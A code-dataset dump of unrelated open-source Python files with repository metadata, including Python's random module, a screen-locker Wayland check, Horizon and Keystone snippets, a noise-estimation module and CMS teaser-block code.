"""Shuffle list x in place, and return None.
Optional argument random is a 0-argument function returning a
random float in [0.0, 1.0); if it is the default None, the
standard random.random will be used.
"""
if random is None:
randbelow = self._randbelow
for i in reversed(range(1, len(x))):
# pick an element in x[:i+1] with which to exchange x[i]
j = randbelow(i+1)
x[i], x[j] = x[j], x[i]
else:
_int = int
for i in reversed(range(1, len(x))):
# pick an element in x[:i+1] with which to exchange x[i]
j = _int(random() * (i+1))
x[i], x[j] = x[j], x[i]
def sample(self, population, k):
"""Chooses k unique random elements from a population sequence or set.
Returns a new list containing elements from the population while
leaving the original population unchanged. The resulting list is
in selection order so that all sub-slices will also be valid random
samples. This allows raffle winners (the sample) to be partitioned
into grand prize and second place winners (the subslices).
Members of the population need not be hashable or unique. If the
population contains repeats, then each occurrence is a possible
selection in the sample.
To choose a sample in a range of integers, use range as an argument.
This is especially fast and space efficient for sampling from a
large population: sample(range(10000000), 60)
"""
# Sampling without replacement entails tracking either potential
# selections (the pool) in a list or previous selections in a set.
# When the number of selections is small compared to the
# population, then tracking selections is efficient, requiring
# only a small set and an occasional reselection. For
# a larger number of selections, the pool tracking method is
# preferred since the list takes less space than the
# set and it doesn't suffer from frequent reselections.
if isinstance(population, _Set):
population = tuple(population)
if not isinstance(population, _Sequence):
raise TypeError("Population must be a sequence or set. For dicts, use list(d).")
randbelow = self._randbelow
n = len(population)
if not 0 <= k <= n:
raise ValueError("Sample larger than population or is negative")
result = [None] * k
setsize = 21 # size of a small set minus size of an empty list
if k > 5:
setsize += 4 ** _ceil(_log(k * 3, 4)) # table size for big sets
if n <= setsize:
# An n-length list is smaller than a k-length set
pool = list(population)
for i in range(k): # invariant: non-selected at [0,n-i)
j = randbelow(n-i)
result[i] = pool[j]
pool[j] = pool[n-i-1] # move non-selected item into vacancy
else:
selected = set()
selected_add = selected.add
for i in range(k):
j = randbelow(n)
while j in selected:
j = randbelow(n)
selected_add(j)
result[i] = population[j]
return result
def choices(self, population, weights=None, *, cum_weights=None, k=1):
"""Return a k sized list of population elements chosen with replacement.
If the relative weights or cumulative weights are not specified,
the selections are made with equal probability.
"""
random = self.random
if cum_weights is None:
if weights is None:
_int = int
total = len(population)
return [population[_int(random() * total)] for i in range(k)]
cum_weights = list(_itertools.accumulate(weights))
elif weights is not None:
raise TypeError('Cannot specify both weights and cumulative weights')
if len(cum_weights) != len(population):
raise ValueError('The number of weights does not match the population')
bisect = _bisect.bisect
total = cum_weights[-1]
return [population[bisect(cum_weights, random() * total)] for i in range(k)]
## -------------------- real-valued distributions -------------------
## -------------------- uniform distribution -------------------
def uniform(self, a, b):
"Get a random number in the range [a, b) or [a, b] depending on rounding."
return a + (b-a) * self.random()
## -------------------- triangular --------------------
def triangular(self, low=0.0, high=1.0, mode=None):
"""Triangular distribution.
Continuous distribution bounded by given lower and upper limits,
and having a given mode value in-between.
http://en.wikipedia.org/wiki/Triangular_distribution
"""
u = self.random()
try:
c = 0.5 if mode is None else (mode - low) / (high - low)
except ZeroDivisionError:
return low
if u > c:
u = 1.0 - u
c = 1.0 - c
low, high = high, low
return low + (high - low) * (u * c) ** 0.5
## -------------------- normal distribution --------------------
def normalvariate(self, mu, sigma):
"""Normal distribution.
mu is the mean, and sigma is the standard deviation.
"""
# mu = mean, sigma = standard deviation
# Uses Kinderman and Monahan method. Reference: Kinderman,
# A.J. and Monahan, J.F., "Computer generation of random
# variables using the ratio of uniform deviates", ACM Trans
# Math Software, 3, (1977), pp257-260.
random = self.random
while 1:
u1 = random()
u2 = 1.0 - random()
z = NV_MAGICCONST*(u1-0.5)/u2
zz = z*z/4.0
if zz <= -_log(u2):
break
return mu + z*sigma
## -------------------- lognormal distribution --------------------
def lognormvariate(self, mu, sigma):
"""Log normal distribution.
If you take the natural logarithm of this distribution, you'll get a
normal distribution with mean mu and standard deviation sigma.
mu can have any value, and sigma must be greater than zero.
"""
return _exp(self.normalvariate(mu, sigma))
## -------------------- exponential distribution --------------------
def expovariate(self, lambd):
"""Exponential distribution.
lambd is 1.0 divided by the desired mean. It should be
nonzero. (The parameter would be called "lambda", but that is
a reserved word in Python.) Returned values range from 0 to
positive infinity if lambd is positive, and from negative
infinity to 0 if lambd is negative.
"""
# lambd: rate lambd = 1/mean
# ('lambda' is a Python reserved word)
# we use 1-random() instead of random() to preclude the
# possibility of taking the log of zero.
return -_log(1.0 - self.random())/lambd
## -------------------- von Mises distribution --------------------
def vonmisesvariate(self, mu, kappa):
"""Circular data distribution.
mu is the mean angle, expressed in radians between 0 and 2*pi, and
kappa is the concentration parameter, which must be greater than or
equal to zero. If kappa is equal to zero, this distribution reduces
to a uniform random angle over the range 0 to 2*pi.
"""
# mu: mean angle (in radians between 0 and 2*pi)
# kappa: concentration parameter kappa (>= 0)
# if kappa = 0 generate uniform random angle
# Based upon an algorithm published in: Fisher, N.I.,
# "Statistical Analysis of Circular Data", Cambridge
# University Press, 1993.
# Thanks to Magnus Kessler for a correction to the
# implementation of step 4.
random = self.random
if kappa <= 1e-6:
return TWOPI * random()
s = 0.5 / kappa
r = s + _sqrt(1.0 + s * s)
while 1:
u1 = random()
z = _cos(_pi * u1)
d = z / (r + z)
u2 = random()
if u2 < 1.0 - d * d or u2 <= (1.0 - d) * _exp(d):
break
q = 1.0 / r
f = (q + z) / (1.0 + q * z)
u3 = random()
if u3 > 0.5:
theta = (mu + _acos(f)) % TWOPI
else:
theta = (mu - _acos(f)) % TWOPI
return theta
## -------------------- gamma distribution --------------------
def gammavariate(self, alpha, beta):
"""Gamma distribution. Not the gamma function!
Conditions on the parameters are alpha > 0 and beta > 0.
The probability distribution function is:
x ** (alpha - 1) * math.exp(-x / beta)
pdf(x) = --------------------------------------
math.gamma(alpha) * beta ** alpha
"""
# alpha > 0, beta > 0, mean is alpha*beta, variance is alpha*beta**2
# Warning: a few older sources define the gamma distribution in terms
# of alpha > -1.0
if alpha <= 0.0 or beta <= 0.0:
raise ValueError('gammavariate: alpha and beta must be > 0.0')
random = self.random
if alpha > 1.0:
# Uses R.C.H. Cheng, "The generation of Gamma
# variables with non-integral shape parameters",
# Applied Statistics, (1977), 26, No. 1, p71-74
ainv = _sqrt(2.0 * alpha - 1.0)
bbb = alpha - LOG4
ccc = alpha + ainv
while 1:
u1 = random()
if not 1e-7 < u1 < .9999999:
continue
u2 = 1.0 - random()
v = _log(u1/(1.0-u1))/ainv
x = alpha*_exp(v)
z = u1*u1*u2
r = bbb+ccc*v-x
if r + SG_MAGICCONST - 4.5*z >= 0.0 or r >= _log(z):
return x * beta
elif alpha == 1.0:
# expovariate(1)
u = random()
while u <= 1e-7:
u = random()
return -_log(u) * beta
else: # alpha is between 0 and 1 (exclusive)
# Uses ALGORITHM GS of Statistical Computing - Kennedy & Gentle
while 1:
u = random()
b = (_e + alpha)/_e
p = b*u
if p <= 1.0:
x = p ** (1.0/alpha)
else:
x = -_log((b-p)/alpha)
u1 = random()
if p > 1.0:
if u1 <= x ** (alpha - 1.0):
break
elif u1 <= _exp(-x):
break
return x * beta
## -------------------- Gauss (faster alternative) --------------------
def gauss(self, mu, sigma):
"""Gaussian distribution.
mu is the mean, and sigma is the standard deviation. This is
slightly faster than the normalvariate() function.
Not thread-safe without a lock around calls.
"""
# When x and y are two variables from [0, 1), uniformly
# distributed, then
#
# cos(2*pi*x)*sqrt(-2*log(1-y))
# sin(2*pi*x)*sqrt(-2*log(1-y))
#
# are two *independent* variables with normal distribution
# (mu = 0, sigma = 1).
# (Lambert Meertens)
# (corrected version; bug discovered by Mike Miller, fixed by LM)
# Multithreading note: When two threads call this function
# simultaneously, it is possible that they will receive the
# same return value. The window is very small though. To
# avoid this, you have to use a lock around all calls. (I
# didn't want to slow this down in the serial case by using a
# lock here.)
random = self.random
z = self.gauss_next
self.gauss_next = None
if z is None:
x2pi = random() * TWOPI
g2rad = _sqrt(-2.0 * _log(1.0 - random()))
z = _cos(x2pi) * g2rad
self.gauss_next = _sin(x2pi) * g2rad
return mu + z*sigma
## -------------------- beta --------------------
## See
## http://mail.python.org/pipermail/python-bugs-list/2001-January/003752.html
## for Ivan Frohne's insightful analysis of why the original implementation:
##
## def betavariate(self, alpha, beta):
## # Discrete Event Simulation in C, pp 87-88.
##
## y = self.expovariate(alpha)
## z = self.expovariate(1.0/beta)
## return z/(y+z)
##
## was dead wrong, and how it probably got that way.
def betavariate(self, alpha, beta):
"""Beta distribution.
Conditions on the parameters are alpha > 0 and beta > 0.
Returned values range between 0 and 1.
"""
# This version due to Janne Sinkkonen, and matches all the std
# texts (e.g., Knuth Vol 2 Ed 3 pg 134 "the beta distribution").
y = self.gammavariate(alpha, 1.0)
if y == 0:
return 0.0
else:
return y / (y + self.gammavariate(beta, 1.0))
## -------------------- Pareto --------------------
def paretovariate(self, alpha):
"""Pareto distribution. alpha is the shape parameter."""
# Jain, pg. 495
u = 1.0 - self.random()
return 1.0 / u ** (1.0/alpha)
## -------------------- Weibull --------------------
def weibullvariate(self, alpha, beta):
"""Weibull distribution.
alpha is the scale parameter and beta is the shape parameter.
"""
# Jain, pg. 499; bug fix courtesy Bill Arms
u = 1.0 - self.random()
return alpha * (-_log(u)) ** (1.0/beta)
## --------------- Operating System Random Source ------------------
class SystemRandom(Random):
"""Alternate random number generator using sources provided
by the operating system (such as /dev/urandom on Unix or
CryptGenRandom on Windows).
Not available on all systems (see os.urandom() for details).
"""
def random(self):
"""Get the next random number in the range [0.0, 1.0)."""
return (int.from_bytes(_urandom(7), 'big') >> 3) * RECIP_BPF
def getrandbits(self, k):
"""getrandbits(k) -> x. Generates an int with k random bits."""
if k <= 0:
raise ValueError('number of bits must be greater than zero')
if k != int(k):
raise TypeError('number of bits should be an integer')
numbytes = (k + 7) // 8 # bits / 8 and rounded up
x = int.from_bytes(_urandom(numbytes), 'big')
return x >> (numbytes * 8 - k) # trim excess bits
def seed(self, *args, **kwds):
"Stub method. Not used for a system random number generator."
return None
def _notimplemented(self, *args, **kwds):
"Method should not be called for a system random number generator."
raise NotImplementedError('System entropy source does not have state.')
getstate = setstate = _notimplemented
## -------------------- test program --------------------
def _test_generator(n, func, args):
import time
print(n, 'times', func.__name__)
total = 0.0
sqsum = 0.0
smallest = 1e10
largest = -1e10
t0 = time.time()
for i in range(n):
x = func(*args)
total += x
sqsum = sqsum + x*x
smallest = min(x, smallest)
largest = max(x, largest)
t1 = time.time()
print(round(t1-t0, 3), 'sec,', end=' ')
avg = total/n
stddev = _sqrt(sqsum/n - avg*avg)
print('avg %g, stddev %g, min %g, max %g\n' % \
(avg, stddev, smallest, largest))
def _test(N=2000):
_test_generator(N, random, ())
_test_generator(N, normalvariate, (0.0, 1.0))
_test_generator(N, lognormvariate, (0.0, 1.0))
_test_generator(N, vonmisesvariate, (0.0, 1.0))
_test_generator(N, gammavariate, (0.01, 1.0))
_test_generator(N, gammavariate, (0.1, 1.0))
_test_generator(N, gammavariate, (0.1, 2.0))
_test_generator(N, gammavariate, (0.5, 1.0))
_test_generator(N, gammavariate, (0.9, 1.0))
_test_generator(N, gammavariate, (1.0, 1.0))
_test_generator(N, gammavariate, (2.0, 1.0))
_test_generator(N, gammavariate, (20.0, 1.0))
_test_generator(N, gammavariate, (200.0, 1.0))
_test_generator(N, gauss, (0.0, 1.0))
_test_generator(N, betavariate, (3.0, 3.0))
_test_generator(N, triangular, (0.0, 1.0, 1.0/3.0))
# Create one instance, seeded from current time, and export its methods
# as module-level functions. The functions share state across all uses
#(both in the user's code and in the Python libraries), but that's fine
# for most programs and is easier for the casual user than making them
# instantiate their own Random() instance.
_inst = Random()
seed = _inst.seed
random = _inst.random
uniform = _inst.uniform
triangular = _inst.triangular
randint = _inst.randint
choice = _inst.choice
randrange = _inst.randrange
sample = _inst.sample
shuffle = _inst.shuffle
choices = _inst.choices
normalvariate = _inst.normalvariate
lognormvariate = _inst.lognormvariate
expovariate = _inst.expovariate
vonmisesvariate = _inst.vonmisesvariate
gammavariate = _inst.gammavariate
gauss = _inst.gauss
betavariate = _inst.betavariate
paretovariate = _inst.paretovariate
weibullvariate = _inst.weibullvariate
getstate = _inst.getstate
setstate = _inst.setstate
getrandbits = _inst.getrandbits
if __name__ == '__main__':
_test()
| thecodinghub/news-for-good | news/Lib/random.py | Python | bsd-3-clause | 27,228 |
import os
import socket
import sys
from xdg.BaseDirectory import get_runtime_dir
def panic(*message_parts, exit_code=1):
"""Print an error message to stderr and exit"""
print("pyxtrlock:", *message_parts, file=sys.stderr)
sys.exit(exit_code)
def require_x11_session():
"""
Detect whether we're running in a Wayland session and abort if so.
"""
if os.environ.get("XDG_SESSION_TYPE") == "x11":
return
if os.environ.get("WAYLAND_DISPLAY"):
panic(
"WAYLAND_DISPLAY is set, suspecting Wayland session. "
"Using pyxtrlock in a Wayland session is insecure. Aborting."
)
if os.environ.get("WAYLAND_SOCKET"):
panic(
"WAYLAND_SOCKET is set, suspecting Wayland session. "
"Using pyxtrlock in a Wayland session is insecure. Aborting."
)
xdg_runtime_dir = get_runtime_dir(strict=True)
wayland_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM, 0)
try:
wayland_socket.connect(os.path.join(xdg_runtime_dir, "wayland-0"))
except OSError:
return
else:
panic(
"Successfully connected to Wayland socket, suspecting Wayland session. "
"Using pyxtrlock in a Wayland session is insecure. Aborting."
)
finally:
wayland_socket.close()
| leonnnn/pyxtrlock | pyxtrlock/__init__.py | Python | gpl-3.0 | 1,342 |
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 20 10:07:47 2018
@author: fschneider
"""
import tensorflow as tf
def _mlp(x, num_outputs):
def dense(inputs, units, activation=tf.nn.relu):
"""Convenience wrapper for max pool layers."""
return tf.layers.dense(
inputs,
units,
activation,
bias_initializer=tf.initializers.constant(0.0),
kernel_initializer=tf.truncated_normal_initializer(stddev=3e-2))
x = tf.reshape(x, [-1, 784])
x = dense(x, 1000)
x = dense(x, 500)
x = dense(x, 100)
linear_outputs = dense(x, num_outputs, None)
return linear_outputs
| fsschneider/DeepOBS | deepobs/tensorflow/testproblems/_mlp.py | Python | mit | 660 |
def handle(foo, *args, <error descr="multiple * parameters are not allowed">*moreargs</error>):
print(foo, args, moreargs)
def handle(foo, *args: int, <error descr="multiple * parameters are not allowed">*moreargs: int</error>):
print(foo, args, moreargs) | dahlstrom-g/intellij-community | python/testData/highlighting/multiplePositionalContainers.py | Python | apache-2.0 | 264 |
from collections import namedtuple
import sklearn.linear_model as lm
import numpy as np
from . import gat, regions
def compute_score(sigmas, tol):
x = (sigmas - 1) / tol
weights = np.exp(-(x**2))
score = np.sum(weights)
if score > 0:
sigma_est = np.sum(sigmas * weights) / score
else:
sigma_est = np.nan
return sigma_est, score
AccumulatorSpace = namedtuple('AccumulatorSpace', ['score', 'sigma_sq_range', 'alpha_range', 'sigma_sq', 'alpha'])
def hough_estimation(blocks, sigma_sq_range, alpha_range, tol=1e-2):
score = np.zeros((len(sigma_sq_range), len(alpha_range)))
for i_a, alpha in enumerate(alpha_range):
for i_s, sigma_sq in enumerate(sigma_sq_range):
# print('{} / {}'.format(i_a, len(alpha_range)), '--',
# '{} / {}'.format(i_s, len(sigma_range)))
blocks_gat = gat.compute_gat(blocks, sigma_sq, alpha=alpha)
sigmas = np.std(blocks_gat, axis=(1, 2), ddof=1)
score[i_s, i_a] = compute_score(sigmas, tol)[1]
max_score_idx = np.argmax(score)
best_params = np.unravel_index(max_score_idx, score.shape)
sigma_sq_est = sigma_sq_range[best_params[0]]
alpha_est = alpha_range[best_params[1]]
print('\tHighest score=', score[best_params[0], best_params[1]])
acc = AccumulatorSpace(score, sigma_sq_range, alpha_range, sigma_sq_est, alpha_est)
return sigma_sq_est, alpha_est, acc
def hough_estimation_point(img, sigma, alpha, tol=2e-3):
return hough_estimation(img, [sigma], [alpha], tol=tol)
def compute_mean_var(blocks):
means = np.mean(blocks, axis=(1, 2))
variances = np.var(blocks, axis=(1, 2), ddof=1)
return means, variances
def regress_sigma_alpha(means, variances, verbose=True):
# reg = lm.LinearRegression(fit_intercept=True)
reg = lm.HuberRegressor(alpha=0, fit_intercept=True)
reg.fit(means[:, np.newaxis], variances)
alpha = reg.coef_[0]
sigma_sq = reg.intercept_
return sigma_sq, alpha
def initial_estimate_sigma_alpha(blocks):
means, variances = compute_mean_var(blocks)
sigma_est, alpha_est = regress_sigma_alpha(means, variances, verbose=False)
return sigma_est, alpha_est
EstimationResult = namedtuple('EstimationResult',
['alpha_init', 'sigma_sq_init', 'alpha', 'sigma_sq', 'acc_space_init', 'acc_space'])
def estimate_vst_movie(movie, block_size=8, stride=8):
blocks = []
for img in movie:
blocks.append(regions.im2col(img, block_size, stride))
blocks = np.vstack(blocks)
return estimate_vst_blocks(blocks)
def estimate_vst_image(img, block_size=8, stride=8):
blocks = regions.im2col(img, block_size, stride)
return estimate_vst_blocks(blocks)
def estimate_vst_blocks(blocks):
sigma_sq_init, alpha_init = initial_estimate_sigma_alpha(blocks)
print('\tinitial alpha = {}; sigma^2 = {}'.format(alpha_init, sigma_sq_init))
diff_s = np.maximum(2e3, np.abs(sigma_sq_init))
diff_a = alpha_init * 0.9
sigma_sq_range = np.linspace(sigma_sq_init - diff_s, sigma_sq_init + diff_s, num=100)
alpha_range = np.linspace(alpha_init - diff_a, alpha_init + diff_a, num=100)
sigma_sq_mid, alpha_mid, acc_init = hough_estimation(blocks, sigma_sq_range, alpha_range)
print('\tmid alpha = {}; sigma^2 = {}'.format(alpha_mid, sigma_sq_mid))
diff_s /= 10
diff_a /= 4
sigma_sq_range = np.linspace(sigma_sq_mid - diff_s, sigma_sq_mid + diff_s, num=100)
alpha_range = np.linspace(alpha_mid - diff_a, alpha_mid + diff_a, num=100)
sigma_sq_final, alpha_final, acc = hough_estimation(blocks, sigma_sq_range, alpha_range)
print('\talpha = {}; sigma^2 = {}'.format(alpha_final, sigma_sq_final))
return EstimationResult(alpha_init, sigma_sq_init, alpha_final, sigma_sq_final, acc_init, acc)
| simonsfoundation/CaImAn | caiman/external/houghvst/estimation.py | Python | gpl-2.0 | 3,834 |
#Copyright (C) 2013 Miheer Dewaskar <miheerdew@gmail.com>
#
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>
import wx
from .common import ListCtrl
from .events import PostEditItemEvent, PostEditQtyEvent
from wx.lib.mixins import listctrl as listmix
class TextEditMixin(listmix.TextEditMixin):
def __init__(self):
self.__item_columns = set(range(1,len(self.headers)-1))
self.__qty_editing_enabled = False
self.__item_editing_enabled = False
listmix.TextEditMixin.__init__(self)
self.Bind(wx.EVT_LIST_BEGIN_LABEL_EDIT, self.__OnLabelEditBegin)
self.Bind(wx.EVT_LIST_END_LABEL_EDIT, self.__OnLabelEditEnd)
def __is_enabled(self, col):
if col in self.__item_columns:
return self.__item_editing_enabled
else:
return self.__qty_editing_enabled
def __OnLabelEditBegin(self, evt):
if self.__is_enabled(evt.m_col):
return evt.Skip()
else:
return evt.Veto()
def __OnLabelEditEnd(self, evt):
if not self.__is_enabled(evt.m_col):
evt.Veto()
return
if evt.m_col in self.__item_columns:
self.OnItemEdit(evt.m_itemIndex, evt.m_col, evt.m_item.GetText())
else:
self.OnQtyEdit(evt.m_itemIndex, evt.m_col, evt.m_item.GetText())
evt.Skip()
def OnItemEdit(self, row, col, txt):
pass
def OnQtyEdit(self, row, col, txt):
pass
def EnableItemEditing(self, enable):
self.__item_editing_enabled = enable
if not enable and self.curCol in self.__item_columns:
#Close the editor if it is shown
self.CloseEditor()
def EnableQtyEditing(self, enable):
self.__qty_editing_enabled = enable
if not enable and self.curCol not in self.__item_columns:
self.CloseEditor()
class ItemViewer(ListCtrl, TextEditMixin):
def __init__(self, parent, **kargs):
self.items = []
self.headers = [('Id',50),('Name',50),('Category',100),('Price',75),('Qty',50)]
self.attrs = ['id','name','category','price','qty']
kargs['style'] = wx.LC_REPORT|wx.LC_VIRTUAL|kargs.get('style',0)
ListCtrl.__init__(self, parent, **kargs)
TextEditMixin.__init__(self)
for i,t in enumerate(self.headers):
self.InsertColumn(i,t[0])
self.SetColumnWidth(i,t[1])
self.setResizeColumn(2)
self.SetItemCount(0)
def GetItemAt(self, index):
return self.items[index]
def UpdateDisplay(self, items):
count = items.count()
self.SetItemCount(count)
self.items = list(items) # to allow assignment in SetVirtualData()
self.RefreshItems(0,count-1)
def OnGetItemText(self, row, col):
return getattr(self.items[row],self.attrs[col])
def SetVirtualData(self, row, col, text):
item = self.items[row]
val = text
if col == 3: #price
val = float(val)
if col == 4: #Qty
val = int(val)
setattr(item, self.attrs[col], val)
if col == 4: #Qty
PostEditQtyEvent(self, item.id, item.qty)
else:
PostEditItemEvent(self, item)
| miheerdew/SalesMan | salesman/lib/gui/ItemViewer.py | Python | gpl-3.0 | 3,806 |
VERSION_STATUS = "ALPHA"
VERSION_DATE = "2011-04-23T00:00:00Z"
from keystone.logic.service import IdentityService
SERVICE = IdentityService()
# These just need to be imported somewhere, nothing appears to access them?
from keystone.backends import sqlalchemy
SQLALCHEMY = sqlalchemy
| ntt-pf-lab/backup_keystone | keystone/config.py | Python | apache-2.0 | 285 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
__author__ = "Vivek Dhayaal"
__copyright__ = "Copyright 2014, Reliance Jio Infocomm Ltd."
from horizon import forms
from horizon import messages
from django import shortcuts
from horizon_jiocloud.api import keystoneapi
from horizon_jiocloud.utils.utils import generate_and_send_sms
from horizon_jiocloud.change_phone import forms as phone_forms
import logging
LOG = logging.getLogger(__name__)
class PhoneView(forms.ModalFormView):
form_class = phone_forms.PhoneForm
template_name = 'change_phone/change.html'
def get_initial(self):
# we use request.session as a temporary storage for the new phone
# number, because after the OTP is sent through SMS to user, until
# he/she submits it through the form, we can't store the new phone
# number in the database but still have to show it in the form
initial = super(PhoneView, self).get_initial()
initial["phone"] = self.request.session.get("phone")
return initial
def sendSms(request):
# This method serves re-sending SMS multiple times until the OTP is
# expired, to cater to SMS sending failures.
phone = request.session.get("phone")
try:
res = keystoneapi.get_user(request.user.id)
if not (res.get("success") or res.get("result")):
raise Exception()
except Exception as ex:
LOG.exception(ex)
user = res.get("result")
sms_activation_code = user.get("sms_activation_code")
try:
generate_and_send_sms(phone, sms_activation_code)
messages.success(request,
'SMS sent successfully')
except Exception as ex:
LOG.exception(ex)
return shortcuts.redirect('horizon:settings:phone:index')
| JioCloud/horizon | horizon_jiocloud/change_phone/views.py | Python | apache-2.0 | 1,800 |
import subprocess
proc = subprocess.Popen(["./lomb", "A.txt"], stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
for line in proc.stdout:
print(line)
proc.wait()
| sonicyang/TIE | tools/sub.py | Python | gpl-2.0 | 172 |
from zeit.cms.i18n import MessageFactory as _
import copy
import grokcore.component as grok
import lxml.objectify
import zeit.cms.content.property
import zeit.cms.interfaces
import zeit.cms.syndication.feed
import zeit.cms.syndication.interfaces
import zeit.content.cp.blocks.block
import zeit.content.cp.interfaces
import zeit.edit.interfaces
import zope.component
import zope.container.interfaces
import zope.interface
import zope.schema
class TeaserBlock(
zeit.content.cp.blocks.block.Block,
zeit.cms.syndication.feed.ContentList):
zope.interface.implementsOnly(
zeit.content.cp.interfaces.ITeaserBlock,
zeit.cms.syndication.interfaces.IFeed,
zope.container.interfaces.IContained)
type = 'teaser'
force_mobile_image = zeit.cms.content.property.ObjectPathAttributeProperty(
'.', 'force_mobile_image', zeit.content.cp.interfaces.ITeaserBlock[
'force_mobile_image'])
def __init__(self, context, xml):
super(TeaserBlock, self).__init__(context, xml)
if self.xml.get('module') == 'teaser':
if isinstance(self.layout, zeit.content.cp.layout.NoBlockLayout):
raise ValueError(_(
'No default teaser layout defined for this area.'))
self.layout = self.layout
assert self.xml.get('module') != 'teaser'
@property
def entries(self):
# overriden so that super.insert() and updateOrder() work
return self.xml
@property
def layout(self):
id = self.xml.get('module')
source = zeit.content.cp.interfaces.ITeaserBlock['layout'].source(
self)
layout = source.find(id)
if layout:
return layout
return zeit.content.cp.interfaces.IArea(self).default_teaser_layout \
or zeit.content.cp.layout.NoBlockLayout(self)
@layout.setter
def layout(self, layout):
self._p_changed = True
self.xml.set('module', layout.id)
TEASERBLOCK_FIELDS = (
set(zope.schema.getFieldNames(
zeit.content.cp.interfaces.ITeaserBlock)) -
set(zeit.cms.content.interfaces.IXMLRepresentation)
)
def update(self, other):
if not zeit.content.cp.interfaces.ITeaserBlock.providedBy(other):
raise ValueError('%r is not an ITeaserBlock' % other)
# Copy teaser contents.
for content in other:
self.append(content)
# Copy block properties (including __name__ and __parent__)
for name in self.TEASERBLOCK_FIELDS:
setattr(self, name, getattr(other, name))
class Factory(zeit.content.cp.blocks.block.BlockFactory):
produces = TeaserBlock
title = _('List of teasers')
@grok.adapter(zeit.content.cp.interfaces.IArea,
zeit.cms.interfaces.ICMSContent,
int)
@grok.implementer(zeit.edit.interfaces.IElement)
def make_block_from_content(container, content, position):
block = Factory(container)(position)
block.insert(0, content)
return block
@grok.adapter(zeit.content.cp.interfaces.ITeaserBlock)
@grok.implementer(zeit.edit.interfaces.IElementReferences)
def cms_content_iter(context):
for teaser in context:
yield teaser
@grok.adapter(zeit.content.cp.interfaces.ICenterPage)
@grok.implementer(zeit.content.cp.interfaces.ITeaseredContent)
def extract_teasers_from_cp(context):
for region in context.values():
for area in region.values():
for teaser in zeit.content.cp.interfaces.ITeaseredContent(area):
yield teaser
@grok.adapter(zeit.content.cp.interfaces.IArea)
@grok.implementer(zeit.content.cp.interfaces.ITeaseredContent)
def extract_teasers_from_area(context):
for teaser in context.filter_values(
zeit.content.cp.interfaces.ITeaserBlock):
for content in list(teaser):
yield content
def extract_manual_teasers(context):
for teaser in context.values():
if not zeit.content.cp.interfaces.ITeaserBlock.providedBy(teaser):
continue
for content in list(teaser):
yield content
@grok.subscribe(
zeit.content.cp.interfaces.ITeaserBlock,
zope.container.interfaces.IObjectMovedEvent)
def change_layout_if_not_allowed_in_new_area(context, event):
# Getting a default layout can mean that the current layout is not allowed
# in this area (can happen when a block was moved between areas). Thus, we
# want to change the XML to actually reflect the new default layout.
if context.layout.is_default(context):
context.layout = context.layout
@grok.subscribe(
zeit.content.cp.interfaces.ITeaserBlock,
zope.container.interfaces.IObjectAddedEvent)
def apply_layout_for_added(context, event):
"""Set layout for new teasers only."""
area = context.__parent__
if not area.apply_teaser_layouts_automatically:
return
# XXX The overflow_blocks handler also listens to the IObjectAddedEvent and
# may have removed this item from the container. Since overflow_blocks
# retrieves the item via a getitem access, it is newly created from the XML
# node. That means `context is not context.__parent__[context.__name__]`.
# Since it is not the same object, changes to the newly created object will
# not be reflected in the context given to event handlers. So we need a
# guard here to check if overflow_blocks has removed the item and skip the
# method in case it has. (Modifying __parent__ of context does not seem
# like a good idea, hell might break loose. So lets just forget about this
# possiblity.)
if context.__name__ not in area.keys():
return
if area.keys().index(context.__name__) == 0:
context.layout = area.first_teaser_layout
else:
context.layout = area.default_teaser_layout
@grok.subscribe(
zeit.content.cp.interfaces.IArea,
zeit.edit.interfaces.IOrderUpdatedEvent)
def set_layout_to_default_when_moved_down_from_first_position(area, event):
if not area.apply_teaser_layouts_automatically:
return
# XXX The overflow_blocks handler listens to the IObjectAddedEvent and may
# have removed this item from the container. In that case we have to do
# nothing, since checking the layout is handled by the new container.
if event.old_order[0] not in area.keys():
return
previously_first = area[event.old_order[0]]
if (zeit.content.cp.interfaces.ITeaserBlock.providedBy(
previously_first) and
area.values().index(previously_first)) > 0:
previously_first.layout = area.default_teaser_layout
@grok.adapter(zeit.content.cp.interfaces.ITeaserBlock)
@grok.implementer(zeit.content.cp.interfaces.IRenderedXML)
def rendered_xml_teaserblock(context):
container = getattr(
lxml.objectify.E, context.xml.tag)(**context.xml.attrib)
# Render non-content items like topiclinks.
for child in context.xml.getchildren():
# BBB: xinclude is not generated anymore, but some might still exist.
if child.tag not in [
'block', '{http://www.w3.org/2003/XInclude}include']:
container.append(copy.copy(child))
# Render content.
for entry in context:
node = zope.component.queryAdapter(
entry, zeit.content.cp.interfaces.IRenderedXML, name="content")
if node is not None:
container.append(node)
return container
@grok.adapter(zeit.cms.interfaces.ICMSContent, name="content")
@grok.implementer(zeit.content.cp.interfaces.IRenderedXML)
def rendered_xml_cmscontent(context):
if not context.uniqueId:
return None
block = lxml.objectify.E.block(
uniqueId=context.uniqueId, href=context.uniqueId)
updater = zeit.cms.content.interfaces.IXMLReferenceUpdater(context)
updater.update(block, suppress_errors=True)
return block
| ZeitOnline/zeit.content.cp | src/zeit/content/cp/blocks/teaser.py | Python | bsd-3-clause | 7,905 |
#!/usr/bin/env python
#/******************************************************************************
# * $Id$
# *
# * Project: GDAL Utilities
# * Purpose: Create a PDS compatible (raw w PDS label) from a GDAL supported image.
# * Currently only LMMP projections supported (geographic,
# * equirectangular, polar_stereographic)
# * Author: Trent Hare, <thare at usgs dot gov>
# * Date: July 20, 2011
# * version: 0.1
# *
# * Port from gdalinfo.py whose author is Even Rouault
# *
# ******************************************************************************
# * Copyright (c) 2010, Even Rouault
# * Copyright (c) 1998, Frank Warmerdam
# *
# * Permission is hereby granted, free of charge, to any person obtaining a
# * copy of this software and associated documentation files (the "Software"),
# * to deal in the Software without restriction, including without limitation
# * the rights to use, copy, modify, merge, publish, distribute, sublicense,
# * and/or sell copies of the Software, and to permit persons to whom the
# * Software is furnished to do so, subject to the following conditions:
# *
# * The above copyright notice and this permission notice shall be included
